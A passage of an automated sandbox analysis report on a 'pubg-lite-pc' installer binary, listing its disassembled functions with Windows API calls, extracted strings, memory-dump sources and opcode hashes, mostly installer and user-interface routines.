                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$DeleteFindHeapNextProcess
                                                                                                • String ID: "$*.*$.$Logging is disabled, discard collected data.$Logging is enabled, sending data ...$session
                                                                                                • API String ID: 3056688879-512075754
                                                                                                • Opcode ID: b77354e9fe90b3ba5c7adc85d841a57c74269f9d6416b77e919cf792dfdd927e
                                                                                                • Instruction ID: 170a38da0eff1f359220bdc30b5523efaa86e24eff2f031912f6876321a164f9
                                                                                                • Opcode Fuzzy Hash: b77354e9fe90b3ba5c7adc85d841a57c74269f9d6416b77e919cf792dfdd927e
                                                                                                • Instruction Fuzzy Hash: F5E1B430905289DFDB21DFA4C864BEEBBB8AF15314F408298D515BB292DB74DB44CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00985690 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 315windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000110A,00000004,000007D7), ref: 00985817
                                                                                                  • Part of subcall function 009730D0: SendMessageW.USER32 ref: 00973110
                                                                                                • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 0098588A
                                                                                                Strings
                                                                                                • MsiSelectionTreeSelectedAction, xrefs: 00985799
                                                                                                • MsiSelectionTreeSelectedFeature, xrefs: 009856F2
                                                                                                • MsiSelectionTreeInstallingChildrenCount, xrefs: 0098594E
                                                                                                • MsiSelectionTreeSelectedCost, xrefs: 00985A6C
                                                                                                • MsiSelectonTreeChildrenCount, xrefs: 009858C3
                                                                                                • MsiSelectionTreeChildrenCost, xrefs: 009859D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: MsiSelectionTreeChildrenCost$MsiSelectionTreeInstallingChildrenCount$MsiSelectionTreeSelectedAction$MsiSelectionTreeSelectedCost$MsiSelectionTreeSelectedFeature$MsiSelectonTreeChildrenCount
                                                                                                • API String ID: 3850602802-306884365
                                                                                                • Opcode ID: 8b29f1c0eced657480093f3d0e34052283d9ae09c717cec9a904bddd20e06052
                                                                                                • Instruction ID: f2dd08e282da10589f48ffbc6d48f8943911c86b71d82247f04a52d898823d14
                                                                                                • Opcode Fuzzy Hash: 8b29f1c0eced657480093f3d0e34052283d9ae09c717cec9a904bddd20e06052
                                                                                                • Instruction Fuzzy Hash: 28D14870E11348EBDB10EFA8C949B9DBBB1FF85314F604259E4116F2D6DB70AA06DB81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009E3730 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 178fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                  • Part of subcall function 00935370: FindResourceW.KERNEL32(00000000,?,00000006,?,000000FF,?,009EB3FB,\\.\pipe\ToServer,?,?,?,00000000,00A7C506,000000FF,?,80004005), ref: 00935397
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,ps1,ps1,00000003,?,009C4008), ref: 009E3823
                                                                                                • WriteFile.KERNEL32(00000000,0000FEFF,00000002,?,00000000), ref: 009E3867
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 009E3884
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009E389E
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 009E38DD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandleWrite$CreateFindHeapProcessResource
                                                                                                • String ID: Unable to get temp file $Unable to save script file $ps1
                                                                                                • API String ID: 3201387394-4253966538
                                                                                                • Opcode ID: 8da40eb9166c6791377a18adf0143795caa23ec1ae5f40426e10a0ddc5cd3830
                                                                                                • Instruction ID: 4cda739018a8aa5a26aa24f633fa8079d47dd462724d55acddae0149c47f7125
                                                                                                • Opcode Fuzzy Hash: 8da40eb9166c6791377a18adf0143795caa23ec1ae5f40426e10a0ddc5cd3830
                                                                                                • Instruction Fuzzy Hash: 7F510670A00249EFDB11DBA9CD49BEEBBB8EF45310F148254F501AB2D2D7B49E04CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B7A70 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 171libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,?,F4D3B90A,?,00000000,00000000,?), ref: 009B7BA7
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 009B7BAE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: -> $%hs()$-----$Dbghelp.dll$SymFromAddr$[0x%.8Ix]
                                                                                                • API String ID: 2574300362-2116945222
                                                                                                • Opcode ID: 4e13af1945fbc1b1f1b1ed54eb285285648b6ec7c42181bc0bb705d8a8e19bbf
                                                                                                • Instruction ID: 34516b5695799820f2318ddd50f2b05eee11118774f3ffb983452e676bfc44a3
                                                                                                • Opcode Fuzzy Hash: 4e13af1945fbc1b1f1b1ed54eb285285648b6ec7c42181bc0bb705d8a8e19bbf
                                                                                                • Instruction Fuzzy Hash: F361AF70A00248EFDB10DFA4CD4ABEE7BB8FF84714F104619F905A7681DBB4AA04CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009D24E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 146libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetSystemDefaultLangID.KERNEL32 ref: 009D251E
                                                                                                • GetUserDefaultLangID.KERNEL32 ref: 009D252B
                                                                                                • LoadLibraryW.KERNEL32(kernel32.dll), ref: 009D253D
                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemDefaultUILanguage), ref: 009D2551
                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 009D2566
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressDefaultLangProc$LibraryLoadSystemUser
                                                                                                • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll
                                                                                                • API String ID: 667524283-3528650308
                                                                                                • Opcode ID: 84b6e8e61483200c5f57cc62f14b51662c89b50d4820c74177265c869667da1f
                                                                                                • Instruction ID: 4d60a67ad1124199cac170903445abf5359c7c55367ec2f316ee4b8d9403e51e
                                                                                                • Opcode Fuzzy Hash: 84b6e8e61483200c5f57cc62f14b51662c89b50d4820c74177265c869667da1f
                                                                                                • Instruction Fuzzy Hash: AB41BC746443019FC744EF28A564ABAB3E5BFE8340F91492FF88683281EB34D844CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00976450 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 132COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00930D80: EnterCriticalSection.KERNEL32(00B0380C,F4D3B90A,009D1D37,?), ref: 00930DF3
                                                                                                  • Part of subcall function 00930D80: LeaveCriticalSection.KERNEL32(00B0380C), ref: 00930E57
                                                                                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,F4D3B90A,?,?), ref: 009764CA
                                                                                                • CreateWindowExW.USER32(00000000,?,00000000,50009385,00000000,00000000,00000000,00000000,00000001,00000001,00000000,00A7510D), ref: 0097650B
                                                                                                • CreateWindowExW.USER32(00000000,SysHeader32,00000000,50000080,?,?,?,?,?,00000000,00000000,?), ref: 00976540
                                                                                                • CreateWindowExW.USER32(00000000,SysHeader32,00000000,40000000,?,?,?,?,?,00000002,00000000), ref: 00976578
                                                                                                • CreateWindowExW.USER32(00000000,SCROLLBAR,00000000,50000004,?,?,?,?,?,00000003,00000000), ref: 009765B0
                                                                                                  • Part of subcall function 00A4335B: GetProcessHeap.KERNEL32(00000008,00000008,?,0092F647,?,?,0092F3F4,?), ref: 00A43360
                                                                                                  • Part of subcall function 00A4335B: HeapAlloc.KERNEL32(00000000,?,?,0092F3F4,?), ref: 00A43367
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateWindow$CriticalHeapSection$AllocEnterErrorLastLeaveProcess
                                                                                                • String ID: SCROLLBAR$SysHeader32$SysTreeView32
                                                                                                • API String ID: 1577318202-3841998675
                                                                                                • Opcode ID: ea0faf7fa08d9ac33cdc3303061960a2009e1ffd58500cd363f43c220131eb4a
                                                                                                • Instruction ID: 963fa818580289125aa755530b6833353f58015cdbb5a0c78023ebfd5c024bed
                                                                                                • Opcode Fuzzy Hash: ea0faf7fa08d9ac33cdc3303061960a2009e1ffd58500cd363f43c220131eb4a
                                                                                                • Instruction Fuzzy Hash: 18417271744300BFE710CF69DD86F6BBBE9EB88B00F108619F644AB291DAB0F9448B55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009DD190 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108processsynchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • Wow64DisableWow64FsRedirection.KERNEL32(00000000,F4D3B90A,?,?), ref: 009DD1D7
                                                                                                • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,F4D3B90A,00A88DFD), ref: 009DD24F
                                                                                                • GetLastError.KERNEL32 ref: 009DD260
                                                                                                • WaitForSingleObject.KERNEL32(00A88DFD,000000FF), ref: 009DD27C
                                                                                                • GetExitCodeProcess.KERNEL32(00A88DFD,00000000), ref: 009DD28D
                                                                                                • CloseHandle.KERNEL32(00A88DFD), ref: 009DD297
                                                                                                • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 009DD2B2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Wow64$ProcessRedirection$CloseCodeCreateDisableErrorExitHandleLastObjectRevertSingleWait
                                                                                                • String ID: D
                                                                                                • API String ID: 1153077990-2746444292
                                                                                                • Opcode ID: 713f95e17b2b4e129969c12259a8f561137d810c750372fd4fa6bdb6d0cd4de3
                                                                                                • Instruction ID: e8fc6f9f536da177f2bbcede436b34df7a68a4d0c5f95a8b413be6db3d5e771c
                                                                                                • Opcode Fuzzy Hash: 713f95e17b2b4e129969c12259a8f561137d810c750372fd4fa6bdb6d0cd4de3
                                                                                                • Instruction Fuzzy Hash: F2417F31E45389ABDB10CFA4CD047EEBBF8AF59314F14865AF825A7290DB749E40CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00975E70 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 453windowlibraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 00975EC2
                                                                                                • IsWindow.USER32(000000FF), ref: 00975ED3
                                                                                                • SendMessageW.USER32(000000FF,00001200,00000000,00000000), ref: 00975F79
                                                                                                • SendMessageW.USER32(?,00001104,00000001,?), ref: 009760DE
                                                                                                • SendMessageW.USER32(000000FF,00001200,00000000,00000000), ref: 00976115
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                  • Part of subcall function 009768E0: SendMessageW.USER32(?,0000113E,00000000,00000001), ref: 0097697A
                                                                                                  • Part of subcall function 009768E0: lstrlenW.KERNEL32(?), ref: 0097698A
                                                                                                  • Part of subcall function 00975610: GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00975678
                                                                                                  • Part of subcall function 00A45A61: EnterCriticalSection.KERNEL32(00B0282C,?,?,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45A6C
                                                                                                  • Part of subcall function 00A45A61: LeaveCriticalSection.KERNEL32(00B0282C,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45AA9
                                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 00976346
                                                                                                  • Part of subcall function 00A45A17: EnterCriticalSection.KERNEL32(00B0282C,?,?,00929407,00B0345C,00A9C710), ref: 00A45A21
                                                                                                  • Part of subcall function 00A45A17: LeaveCriticalSection.KERNEL32(00B0282C,?,00929407,00B0345C,00A9C710), ref: 00A45A54
                                                                                                  • Part of subcall function 00A45A17: RtlWakeAllConditionVariable.NTDLL ref: 00A45ACB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalMessageSectionSend$AddressEnterLeaveProcWindow$ConditionHeapProcessVariableWakelstrlen
                                                                                                • String ID: DrawThemeText
                                                                                                • API String ID: 2398213494-2508557991
                                                                                                • Opcode ID: 47de12715fa99afbf1e9b39caa972d4b41bec891e37071f016d5b53c787e9052
                                                                                                • Instruction ID: 5c5686161faca880e86bf148423b8c98cd952bb56de314ef9c0e0787cad575d4
                                                                                                • Opcode Fuzzy Hash: 47de12715fa99afbf1e9b39caa972d4b41bec891e37071f016d5b53c787e9052
                                                                                                • Instruction Fuzzy Hash: E8127C71E00A09DFDB14CFA8C948B9DBBF9FF48310F248259E519AB2A1DB74A945CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B30D0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RemoveDirectoryW.KERNEL32(?,00000000,?,\\?\,00000004,?,009B3B3B), ref: 009B3173
                                                                                                  • Part of subcall function 00935370: FindResourceW.KERNEL32(00000000,?,00000006,?,000000FF,?,009EB3FB,\\.\pipe\ToServer,?,?,?,00000000,00A7C506,000000FF,?,80004005), ref: 00935397
                                                                                                  • Part of subcall function 00928FC0: RtlAllocateHeap.NTDLL(?,00000000,?,F4D3B90A,00000000,00A65840,000000FF,?,?,00AF91CC,?,009EAA18,80004005,F4D3B90A), ref: 0092900A
                                                                                                • RemoveDirectoryW.KERNEL32(00000008,F4D3B90A,00000008,00000000,00000008,00000000,00A804ED,000000FF,?,009B3B3B), ref: 009B31A2
                                                                                                • GetLastError.KERNEL32(?,009B3B3B), ref: 009B31B2
                                                                                                • DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,00000000,00A804ED,000000FF,?,80004005,F4D3B90A,00000008,00000000,00000008,00000000), ref: 009B3283
                                                                                                • GetLastError.KERNEL32(?,F4D3B90A,00000008,00000000,?,00000000,00A804ED,000000FF,?,80004005,F4D3B90A,00000008,00000000,00000008,00000000,00A804ED), ref: 009B32C2
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                • DeleteFileW.KERNEL32(?,F4D3B90A,00000008,00000000,?,00000000,00A804ED,000000FF,?,80004005,F4D3B90A,00000008,00000000,00000008,00000000,00A804ED), ref: 009B32B2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteDirectoryErrorFileHeapLastRemove$AllocateFindProcessResource
                                                                                                • String ID: \\?\
                                                                                                • API String ID: 4126803612-4282027825
                                                                                                • Opcode ID: cf621a3ece06d93897f7fb383148d5730ea1153cc97fd98bf2ba5cb22e856a36
                                                                                                • Instruction ID: 4b8d8ad065217a71baafe5f0a8d2c0738763e2946a9170e9bdd2bfe35428f037
                                                                                                • Opcode Fuzzy Hash: cf621a3ece06d93897f7fb383148d5730ea1153cc97fd98bf2ba5cb22e856a36
                                                                                                • Instruction Fuzzy Hash: 49A1DE31A01609EFDB00DBA8CD48BAEB7F9FF45331F108659E821D72A1DB719A04CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0099D6B0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 232fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?), ref: 0099D749
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0099D770
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                  • Part of subcall function 0099F130: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,80070057,F4D3B90A,?,?,00000000,00A65BD0,000000FF,00000000,009B4322), ref: 0099F16D
                                                                                                  • Part of subcall function 0099F130: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000,80070057,80004005), ref: 0099F19E
                                                                                                  • Part of subcall function 0099F130: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,00000000,?,00000000,00000000,00000000), ref: 0099F1D6
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?), ref: 0099D7E5
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0099D837
                                                                                                  • Part of subcall function 0099EF50: WideCharToMultiByte.KERNEL32(00000003,00000000,009C346A,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,009C346A,?,?), ref: 0099EF6C
                                                                                                  • Part of subcall function 0099EF50: WideCharToMultiByte.KERNEL32(00000003,00000000,009C346A,000000FF,?,-00000001,00000000,00000000,?,00000000,?,009C346A,?,?), ref: 0099EFA3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$CloseFileHandle$CreateFindHeapProcessResourceWrite
                                                                                                • String ID: .bat$EXE$open
                                                                                                • API String ID: 1500229797-2898749727
                                                                                                • Opcode ID: bc1756c45d38640b403dcfad4a34712b6709e8d41632a67a160577671b6b8846
                                                                                                • Instruction ID: 659f097fe2195a8e37c9f493a5808c6e0d57907d6a9b2c3321b08eb18e24644f
                                                                                                • Opcode Fuzzy Hash: bc1756c45d38640b403dcfad4a34712b6709e8d41632a67a160577671b6b8846
                                                                                                • Instruction Fuzzy Hash: E6A16B70902649EFDB10DFACC988B9DFBB8FF45314F248259E415AB292DB749944CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009486C0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 218windowstringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,000000C5,?,00000000), ref: 00948711
                                                                                                • SendMessageW.USER32(?,0000043A,00000000,00000074), ref: 00948775
                                                                                                • lstrcpynW.KERNEL32(?,?,00000020), ref: 009487E7
                                                                                                • MulDiv.KERNEL32(?,00000048,00000000), ref: 00948824
                                                                                                • SendMessageW.USER32(?,00000444,00000000,00000074), ref: 00948856
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrcpyn
                                                                                                • String ID: ?$t
                                                                                                • API String ID: 3928028829-1995845436
                                                                                                • Opcode ID: c9d2f40bb9217443079e5f05538c129eeb91b52b86775c4bfe61bdfb2517a735
                                                                                                • Instruction ID: 5022cec8a034e581e8e26e754cd1de6518e6e3e599df4722e564b9e4ae3401b5
                                                                                                • Opcode Fuzzy Hash: c9d2f40bb9217443079e5f05538c129eeb91b52b86775c4bfe61bdfb2517a735
                                                                                                • Instruction Fuzzy Hash: 09915D71618340AFE721DB68CC45F9FBBE9AF88300F044A29F699D71A1EB74A544CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00982640 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 163windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(?,msctls_progress32,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0098275E
